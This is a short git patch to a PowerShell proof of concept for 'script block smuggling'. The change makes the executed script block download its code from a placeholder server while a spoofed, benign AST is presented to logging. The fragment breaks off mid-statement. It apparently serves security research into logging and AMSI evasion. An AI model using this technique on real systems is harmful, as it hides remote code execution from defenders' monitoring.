From 7725aa517146e7699645cd2382ce98ec8ca01266 Mon Sep 17 00:00:00 2001
From: CyberAustin <88937794+CyberAustin@users.noreply.github.com>
Date: Tue, 18 Jun 2024 10:35:30 +0200
Subject: [PATCH] Update ScriptBlockSmuggling.ps1

Updated the $ExecutedAst to match the code in the blog post: https://bc-security.org/scriptblock-smuggling/

Otherwise $wc is pointless in this example.
---
 ScriptBlockSmuggling.ps1 | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/ScriptBlockSmuggling.ps1 b/ScriptBlockSmuggling.ps1
index d3155d6..5e9e562 100644
--- a/ScriptBlockSmuggling.ps1
+++ b/ScriptBlockSmuggling.ps1
@@ -1,6 +1,6 @@
 $wc=New-Object System.Net.WebClient
 $SpoofedAst = [ScriptBlock]::Create("Write-Output 'Hello'").Ast  
-$ExecutedAst = [ScriptBlock]::Create("Write-Output 'World'").Ast
+$ExecutedAst = [ScriptBlock]::Create($wc.DownloadData(<server>)).Ast
 $Ast = [System.Management.Automation.Language.ScriptBlockAst]::new($SpoofedAst.Extent,
                                                                    $null,
                                                                    $null,